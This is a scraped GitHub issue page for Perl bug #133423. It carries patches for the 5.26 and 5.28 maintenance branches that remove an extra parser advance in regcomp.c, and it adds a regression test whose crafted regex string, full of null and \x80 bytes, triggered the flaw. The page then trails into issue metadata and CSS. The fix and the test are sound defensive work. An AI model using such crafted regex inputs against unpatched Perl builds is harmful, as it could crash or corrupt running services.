\n2.17.1\n\n\"\u003e\u003cpre class=\"notranslate\"\u003eFrom 048958aa54379e02093268f851b55b3de3b475fe Mon Sep 17 00:00:00 2001\nFrom: Karl Williamson \u0026lt;khw@cpan.org\u0026gt;\nDate: Mon, 24 Sep 2018 11:55:55 -0600\nSubject: [PATCH 3/3] PATCH: [perl #133423] for maint 5.28\n\n\u003cspan class=\"pl-ms\"\u003e---\u003c/span\u003e\n regcomp.c | 1 -\n t/re/reg_mesg.t | 3 +++\n 2 files changed, 3 insertions(+), 1 deletion(-)\n\n\u003cspan class=\"pl-c1\"\u003ediff --git a/regcomp.c b/regcomp.c\u003c/span\u003e\nindex f694ff7f8b..e1da15a77c 100644\n\u003cspan class=\"pl-md\"\u003e--- a/regcomp.c\u003c/span\u003e\n\u003cspan class=\"pl-mi1\"\u003e+++ b/regcomp.c\u003c/span\u003e\n\u003cspan class=\"pl-mdr\"\u003e@@ -15591,7 +15591,6 @@\u003c/span\u003e redo_curchar:\n if (UCHARAT(RExC_parse) != ')')\n vFAIL(\"Expecting close paren for wrapper for nested extended charclass\");\n \n\u003cspan class=\"pl-md\"\u003e\u003cspan class=\"pl-md\"\u003e-\u003c/span\u003e RExC_parse++;\u003c/span\u003e\n RExC_flags = save_flags;\n goto handle_operand;\n }\n\u003cspan class=\"pl-c1\"\u003ediff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t\u003c/span\u003e\nindex 5fb1f1a46c..2880be45eb 100644\n\u003cspan class=\"pl-md\"\u003e--- a/t/re/reg_mesg.t\u003c/span\u003e\n\u003cspan class=\"pl-mi1\"\u003e+++ b/t/re/reg_mesg.t\u003c/span\u003e\n\u003cspan class=\"pl-mdr\"\u003e@@ -122,6 +122,8 @@\u003c/span\u003e my $tab_hex = sprintf \"%02X\", ord(\"\\t\");\n #\n # The first set are those that should be fatal errors.\n \n\u003cspan class=\"pl-mi1\"\u003e\u003cspan class=\"pl-mi1\"\u003e+\u003c/span\u003emy $bug133423 = \"(?[(?^:(?[\\\\\\x00]))\\\\]\\x00|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670\";\u003c/span\u003e\n\u003cspan class=\"pl-mi1\"\u003e\u003cspan class=\"pl-mi1\"\u003e+\u003c/span\u003e\u003c/span\u003e\n my @death =\n (\n '/[[=foo=]]/' =\u0026gt; 'POSIX syntax [= =] is reserved for future extensions {#} m/[[=foo=]{#}]/',\n\u003cspan class=\"pl-mdr\"\u003e@@ -307,6 +309,7 @@\u003c/span\u003e my @death =\n '/\\A{/' =\u0026gt; 'Unescaped left brace in regex is illegal here {#} m/\\A{{#}/',\n '/(?\u0026lt;=/' =\u0026gt; 'Sequence (?... not terminated {#} m/(?\u0026lt;={#}/', # [perl #128170]\n '/\\p{vertical � tab}/' =\u0026gt; 'Can\\'t find Unicode property definition \"vertical � tab\" {#} m/\\\\p{vertical � tab}{#}/', # [perl #132055]\n\u003cspan class=\"pl-mi1\"\u003e\u003cspan class=\"pl-mi1\"\u003e+\u003c/span\u003e \"/$bug133423/\" =\u0026gt; \"Operand with no preceding operator {#} m/(?[(?^:(?[\\\\�]))\\\\{#}]�|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670/\",\u003c/span\u003e\n \n );\n \n\u003cspan class=\"pl-md\"\u003e\u003cspan class=\"pl-md\"\u003e-\u003c/span\u003e- \u003c/span\u003e\n2.17.1\n\n\u003c/pre\u003e\u003c/div\u003e\n\u003c/details\u003e","bodyVersion":"56160310e9a13224567bace30f39040f2709731d06523569ea516acdef8fbac3","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097459","createdAt":"2018-09-25T04:44:29Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZg8K98gAqTU0NDA5NzQ1OQ=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097461,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ2MQ==","body":"### From @tonycoz\n\n\u003cdetails\u003e\u003csummary\u003e0242-PATCH-perl-133423-for-5.26-maint.patch\u003c/summary\u003e\n\n```diff\nFrom df2858ea28eb2c7e00a4bd6a5ed95e4782f88333 Mon Sep 17 00:00:00 2001\nFrom: Karl Williamson \u003ckhw@cpan.org\u003e\nDate: Mon, 24 Sep 2018 11:54:41 -0600\nSubject: [PATCH 242/242] PATCH: [perl #133423] for 5.26 maint\n\n---\n regcomp.c | 1 -\n t/re/reg_mesg.t | 4 ++++\n 2 files changed, 4 insertions(+), 1 deletion(-)\n\ndiff --git a/regcomp.c b/regcomp.c\nindex ca47db7573..431006e855 100644\n--- a/regcomp.c\n+++ b/regcomp.c\n@@ -15109,7 +15109,6 @@ redo_curchar:\n RExC_parse++;\n assert(UCHARAT(RExC_parse) == ')');\n \n- RExC_parse++;\n RExC_flags = save_flags;\n goto handle_operand;\n }\ndiff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t\nindex 39cfcf7df1..d26a7caf37 100644\n--- a/t/re/reg_mesg.t\n+++ b/t/re/reg_mesg.t\n@@ -106,6 +106,8 @@ my $high_mixed_digit = ('A' lt '0') ? '0' : 'A';\n my $colon_hex = sprintf \"%02X\", ord(\":\");\n my $tab_hex = sprintf \"%02X\", ord(\"\\t\");\n \n+my $bug133423 = \"(?[(?^:(?[\\\\\\x00]))\\\\]\\x00|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670\";\n+\n ##\n ## Key-value pairs of code/error of code that should have fatal errors.\n ##\n@@ -290,6 +292,8 @@ my @death =\n '/(?xmsixp)abc/' =\u003e \"\",\n '/(?xxxx:abc)/' =\u003e \"\",\n '/(?\u003c=/' =\u003e 'Sequence (?... not terminated {#} m/(?\u003c={#}/', # [perl #128170]\n+ \"/$bug133423/\" =\u003e \"Operand with no preceding operator {#} m/(?[(?^:(?[\\\\\u0000]))\\\\{#}]\u0000|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670/\",\n+\n \n );\n \n-- \n2.17.1\n\n\n```\n\u003c/details\u003e\n","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/tonycoz/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/tonycoz\"\u003e@tonycoz\u003c/a\u003e\u003c/h3\u003e\n\u003cdetails\u003e\u003csummary\u003e0242-PATCH-perl-133423-for-5.26-maint.patch\u003c/summary\u003e\n\u003cdiv class=\"highlight highlight-source-diff notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"From df2858ea28eb2c7e00a4bd6a5ed95e4782f88333 Mon Sep 17 00:00:00 2001\nFrom: Karl Williamson \u0026lt;khw@cpan.org\u0026gt;\nDate: Mon, 24 Sep 2018 11:54:41 -0600\nSubject: [PATCH 242/242] PATCH: [perl #133423] for 5.26 maint\n\n---\n regcomp.c | 1 -\n t/re/reg_mesg.t | 4 ++++\n 2 files changed, 4 insertions(+), 1 deletion(-)\n\ndiff --git a/regcomp.c b/regcomp.c\nindex ca47db7573..431006e855 100644\n--- a/regcomp.c\n+++ b/regcomp.c\n@@ -15109,7 +15109,6 @@ redo_curchar:\n RExC_parse++;\n assert(UCHARAT(RExC_parse) == ')');\n \n- RExC_parse++;\n RExC_flags = save_flags;\n goto handle_operand;\n }\ndiff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t\nindex 39cfcf7df1..d26a7caf37 100644\n--- a/t/re/reg_mesg.t\n+++ b/t/re/reg_mesg.t\n@@ -106,6 +106,8 @@ my $high_mixed_digit = ('A' lt '0') ? '0' : 'A';\n my $colon_hex = sprintf \u0026quot;%02X\u0026quot;, ord(\u0026quot;:\u0026quot;);\n my $tab_hex = sprintf \u0026quot;%02X\u0026quot;, ord(\u0026quot;\\t\u0026quot;);\n \n+my $bug133423 = \u0026quot;(?[(?^:(?[\\\\\\x00]))\\\\]\\x00|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670\u0026quot;;\n+\n ##\n ## Key-value pairs of code/error of code that should have fatal errors.\n ##\n@@ -290,6 +292,8 @@ my @death =\n '/(?xmsixp)abc/' =\u0026gt; \u0026quot;\u0026quot;,\n '/(?xxxx:abc)/' =\u0026gt; \u0026quot;\u0026quot;,\n '/(?\u0026lt;=/' =\u0026gt; 'Sequence (?... not terminated {#} m/(?\u0026lt;={#}/', # [perl #128170]\n+ \u0026quot;/$bug133423/\u0026quot; =\u0026gt; \u0026quot;Operand with no preceding operator {#} m/(?[(?^:(?[\\\\�]))\\\\{#}]�|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670/\u0026quot;,\n+\n \n );\n \n-- \n2.17.1\n\n\"\u003e\u003cpre class=\"notranslate\"\u003eFrom df2858ea28eb2c7e00a4bd6a5ed95e4782f88333 Mon Sep 17 00:00:00 2001\nFrom: Karl Williamson \u0026lt;khw@cpan.org\u0026gt;\nDate: Mon, 24 Sep 2018 11:54:41 -0600\nSubject: [PATCH 242/242] PATCH: [perl #133423] for 5.26 maint\n\n\u003cspan class=\"pl-ms\"\u003e---\u003c/span\u003e\n regcomp.c | 1 -\n t/re/reg_mesg.t | 4 ++++\n 2 files changed, 4 insertions(+), 1 deletion(-)\n\n\u003cspan class=\"pl-c1\"\u003ediff --git a/regcomp.c b/regcomp.c\u003c/span\u003e\nindex ca47db7573..431006e855 100644\n\u003cspan class=\"pl-md\"\u003e--- a/regcomp.c\u003c/span\u003e\n\u003cspan class=\"pl-mi1\"\u003e+++ b/regcomp.c\u003c/span\u003e\n\u003cspan class=\"pl-mdr\"\u003e@@ -15109,7 +15109,6 @@\u003c/span\u003e redo_curchar:\n RExC_parse++;\n assert(UCHARAT(RExC_parse) == ')');\n \n\u003cspan class=\"pl-md\"\u003e\u003cspan class=\"pl-md\"\u003e-\u003c/span\u003e RExC_parse++;\u003c/span\u003e\n RExC_flags = save_flags;\n goto handle_operand;\n }\n\u003cspan class=\"pl-c1\"\u003ediff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t\u003c/span\u003e\nindex 39cfcf7df1..d26a7caf37 100644\n\u003cspan class=\"pl-md\"\u003e--- a/t/re/reg_mesg.t\u003c/span\u003e\n\u003cspan class=\"pl-mi1\"\u003e+++ b/t/re/reg_mesg.t\u003c/span\u003e\n\u003cspan class=\"pl-mdr\"\u003e@@ -106,6 +106,8 @@\u003c/span\u003e my $high_mixed_digit = ('A' lt '0') ? '0' : 'A';\n my $colon_hex = sprintf \"%02X\", ord(\":\");\n my $tab_hex = sprintf \"%02X\", ord(\"\\t\");\n \n\u003cspan class=\"pl-mi1\"\u003e\u003cspan class=\"pl-mi1\"\u003e+\u003c/span\u003emy $bug133423 = \"(?[(?^:(?[\\\\\\x00]))\\\\]\\x00|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670\";\u003c/span\u003e\n\u003cspan class=\"pl-mi1\"\u003e\u003cspan class=\"pl-mi1\"\u003e+\u003c/span\u003e\u003c/span\u003e\n ##\n ## Key-value pairs of code/error of code that should have fatal errors.\n ##\n\u003cspan class=\"pl-mdr\"\u003e@@ -290,6 +292,8 @@\u003c/span\u003e my @death =\n '/(?xmsixp)abc/' =\u0026gt; \"\",\n '/(?xxxx:abc)/' =\u0026gt; \"\",\n '/(?\u0026lt;=/' =\u0026gt; 'Sequence (?... not terminated {#} m/(?\u0026lt;={#}/', # [perl #128170]\n\u003cspan class=\"pl-mi1\"\u003e\u003cspan class=\"pl-mi1\"\u003e+\u003c/span\u003e \"/$bug133423/\" =\u0026gt; \"Operand with no preceding operator {#} m/(?[(?^:(?[\\\\�]))\\\\{#}]�|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670/\",\u003c/span\u003e\n\u003cspan class=\"pl-mi1\"\u003e\u003cspan class=\"pl-mi1\"\u003e+\u003c/span\u003e\u003c/span\u003e\n \n );\n \n\u003cspan class=\"pl-md\"\u003e\u003cspan class=\"pl-md\"\u003e-\u003c/span\u003e- \u003c/span\u003e\n2.17.1\n\n\u003c/pre\u003e\u003c/div\u003e\n\u003c/details\u003e","bodyVersion":"c2032a46324af389d290a694a585e569732560b67d1ec143c2ba45588ff8bf02","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097461","createdAt":"2018-09-25T04:44:29Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZg8K98gAqTU0NDA5NzQ2MQ=="}]},"backTimelineItems":{"pageInfo":{"hasPreviousPage":true,"startCursor":null},"totalCount":33,"edges":[]}},"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw"},"safeViewer":null}},"timestamp":1743578475}]},"title":null,"appPayload":{"initial_view_content":{"team_id":null,"can_edit_view":true},"current_user":null,"current_user_settings":{"use_monospace_font":false,"use_single_key_shortcut":false,"preferred_emoji_skin_tone":null},"paste_url_link_as_plain_text":false,"base_avatar_url":"https://avatars.githubusercontent.com","help_url":"https://docs.github.com","sso_organizations":null,"multi_tenant":false,"tracing":false,"tracing_flamegraph":false,"catalog_service":"github/issues_experience","scoped_repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","owner":"Perl","name":"perl5","is_archived":false},"copilot_api_url":null,"enabled_features":{"use_pull_request_subscriptions_enabled":false,"pull_request_single_subscription":true,"disable_issues_react_ssr":false,"issues_react":false,"issues_react_prefetch":false,"issue_types":true,"issues_react_dashboard_saved_views":false,"sub_issues":true,"issues_react_milestone_show":false,"copilot_natural_language_github_search":false,"private_avatars":false,"reserved_domain":true,"projects_classic_sunset_override":false,"issues_react_validate_timeline_items":false,"refresh_image_video_src":true,"issues_react_bypass_es_limits":true,"issues_react_csr_index_actions":true,"notifyd_issue_watch_activity_notify":false,"notifyd_enable_issue_thread_subscriptions":false,"issues_react_new_sort_dropdown":true,"issues_react_new_select_panel":false,"timeline_best_effort_count_optimization":false,"copilot_auto_assign_metadata":false,"issues_react_create_milestone":true,"issues_react_preload_labels":true,"copilot_workspace_use_moda":false,"copilot_workspace_cross_repo_selection":false,"issues_react_disable_sticky_header_observer":true,"issues_react_grouped_diff_on_edit_history":true,"issues_react_bypass_template_selection":true,"copilot_agent_mode":false,"issues_react_duplicate_issue":false,"issues_react_force_turbo_nav":false,"copilot_swe_agent":false,"issues_dashboard_use_sidepanel":true,"issues_dashboard_no_redirects":true,"copilot_plan_brainstorm_with_blackbird":false,"elasticsearch_semantic_indexing_issues_show_dupes":false,"issues_react_assignee_picker_v2":false,"copilot_workspace":null,"tasklist_block":false,"issues_react_perf_test":false}}}</script> <div data-target="react-app.reactRoot"><style data-styled="true" data-styled-version="5.3.11">.gjuRkX{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;height:100%;-webkit-box-pack:stretch;-webkit-justify-content:stretch;-ms-flex-pack:stretch;justify-content:stretch;}/*!sc*/ .gjuRkX > *{width:100%;}/*!sc*/ .hzqxma{height:100%;}/*!sc*/ .fGkgDM{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex:auto;-ms-flex:auto;flex:auto;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:stretch;-webkit-justify-content:stretch;-ms-flex-pack:stretch;justify-content:stretch;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;position:relative;padding-top:16px;}/*!sc*/ .ehzXEi{-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;max-width:1280px;width:100%;padding-top:0;padding-left:16px;padding-right:16px;padding-bottom:0;}/*!sc*/ @media screen and (min-width:544px){.ehzXEi{padding-left:16px;padding-right:16px;}}/*!sc*/ @media screen and (min-width:768px){.ehzXEi{padding-left:24px;padding-right:24px;}}/*!sc*/ .cEqqlB{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;padding-top:8px;}/*!sc*/ @media screen and (min-width:544px){.cEqqlB{padding-top:8px;}}/*!sc*/ @media screen and (min-width:768px){.cEqqlB{padding-top:0;}}/*!sc*/ @media screen and (min-width:1012px){.cEqqlB{padding-top:0;}}/*!sc*/ .dZmqGw{line-height:1;font-size:26px;font-weight:400;margin-right:8px;}/*!sc*/ @media screen and (min-width:544px){.dZmqGw{font-size:26px;}}/*!sc*/ @media screen and (min-width:768px){.dZmqGw{font-size:var(--text-title-size-large,32px);}}/*!sc*/ @media screen and (min-width:1012px){.dZmqGw{font-size:var(--text-title-size-large,32px);}}/*!sc*/ .lhNOUb{display:inline;word-break:break-word;}/*!sc*/ .YJa-Di{display:inline;white-space:nowrap;color:var(--fgColor-muted,var(--color-fg-muted,#656d76));font-weight:300;}/*!sc*/ .ialRZd{-webkit-box-flex:0;-webkit-flex-grow:0;-ms-flex-positive:0;flex-grow:0;width:100%;-webkit-box-pack:left;-webkit-justify-content:left;-ms-flex-pack:left;justify-content:left;}/*!sc*/ .cQpCwc{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;gap:4px;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;-webkit-box-pack:end;-webkit-justify-content:end;-ms-flex-pack:end;justify-content:end;}/*!sc*/ .lkyTpy{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;-webkit-flex-basis:auto;-ms-flex-preferred-size:auto;flex-basis:auto;margin-left:4px;}/*!sc*/ @media screen and (min-width:544px){.lkyTpy{-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;}}/*!sc*/ @media screen and (min-width:768px){.lkyTpy{-webkit-box-flex:0;-webkit-flex-grow:0;-ms-flex-positive:0;flex-grow:0;}}/*!sc*/ @media screen and (min-width:1012px){.lkyTpy{-webkit-box-flex:0;-webkit-flex-grow:0;-ms-flex-positive:0;flex-grow:0;}}/*!sc*/ .bKeiGd{display:none;min-width:-webkit-max-content;min-width:-moz-max-content;min-width:max-content;}/*!sc*/ @media screen and (min-width:544px){.bKeiGd{display:none;}}/*!sc*/ @media screen and (min-width:768px){.bKeiGd{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;}}/*!sc*/ @media screen and (min-width:1012px){.bKeiGd{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;}}/*!sc*/ .eshSer{height:100%;min-height:56px;width:100%;}/*!sc*/ .cySYaL{border-bottom:1px solid;border-color:var(--borderColor-muted,var(--color-border-subtle,rgba(31,35,40,0.15)));display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;height:100%;width:100%;}/*!sc*/ .exQbKw{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;gap:8px;padding-top:var(--base-size-12,12px);padding-bottom:var(--base-size-12,12px);overflow:hidden;}/*!sc*/ .emuTBT{-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;background-color:var(--bgColor-default,var(--color-canvas-default,#ffffff));border-bottom:1px solid;border-color:var(--borderColor-default,var(--color-border-default,#d0d7de));display:none;height:56px;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;position:-webkit-sticky;position:sticky;width:100%;z-index:14;}/*!sc*/ .iEncmA{-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;gap:8px;width:100%;}/*!sc*/ .fHWHoy{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;gap:2px;overflow:hidden;width:100%;}/*!sc*/ .htJDeH{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;width:100%;}/*!sc*/ .hVVawZ{color:var(--fgColor-default,var(--color-fg-default,#1F2328));display:block;font-weight:600;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;word-break:break-word;}/*!sc*/ .iQfnYL{color:var(--fgColor-muted,var(--color-fg-muted,#656d76));margin-left:4px;}/*!sc*/ .jGasrR{-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;color:var(--fgColor-muted,var(--color-fg-muted,#656d76));display:none;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;-webkit-flex-wrap:nowrap;-ms-flex-wrap:nowrap;flex-wrap:nowrap;font-size:12px;min-width:0;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}/*!sc*/ @media screen and (min-width:544px){.jGasrR{display:none;}}/*!sc*/ @media screen and (min-width:768px){.jGasrR{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;}}/*!sc*/ @media screen and (min-width:1012px){.jGasrR{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;}}/*!sc*/ .jGasrR > *:not(:last-child)::after{content:"•";margin-left:4px;margin-right:4px;}/*!sc*/ .gxAvdY{top:-1px;height:1px;visibility:hidden;}/*!sc*/ .dkqtNN{-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;max-width:1280px;width:100%;padding-top:0;padding-left:16px;padding-right:16px;padding-bottom:0;margin-bottom:24px;}/*!sc*/ @media screen and (min-width:544px){.dkqtNN{padding-left:16px;padding-right:16px;}}/*!sc*/ @media screen and (min-width:768px){.dkqtNN{padding-left:24px;padding-right:24px;}}/*!sc*/ .hfKjHv{width:100%;}/*!sc*/ .jonlJW{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex:auto;-ms-flex:auto;flex:auto;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:stretch;-webkit-justify-content:stretch;-ms-flex-pack:stretch;justify-content:stretch;gap:8px;}/*!sc*/ @media screen and (min-width:544px){.jonlJW{-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;gap:8px;}}/*!sc*/ @media screen and (min-width:768px){.jonlJW{-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;gap:8px;}}/*!sc*/ @media screen and (min-width:1012px){.jonlJW{-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;gap:24px;}}/*!sc*/ .bSTcOH{width:100%;background-color:var(--bgColor-default,var(--color-canvas-default,#ffffff));z-index:1;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;min-width:0;}/*!sc*/ @media screen and (min-width:544px){.bSTcOH{width:100%;}}/*!sc*/ @media screen and (min-width:768px){.bSTcOH{width:auto;}}/*!sc*/ @media screen and (min-width:1012px){.bSTcOH{width:auto;}}/*!sc*/ .gRssIw{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;gap:16px;}/*!sc*/ .bDlPR{-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;-webkit-order:1;-ms-flex-order:1;order:1;min-width:0;}/*!sc*/ @media screen and (min-width:544px){.bDlPR{-webkit-order:1;-ms-flex-order:1;order:1;}}/*!sc*/ @media screen and (min-width:768px){.bDlPR{-webkit-order:1;-ms-flex-order:1;order:1;}}/*!sc*/ @media screen and (min-width:1012px){.bDlPR{-webkit-order:1;-ms-flex-order:1;order:1;}}/*!sc*/ @media screen and (min-width:1280px){.bDlPR{-webkit-order:0;-ms-flex-order:0;order:0;}}/*!sc*/ .bDlPR video{aspect-ratio:16/9;width:100%;}/*!sc*/ 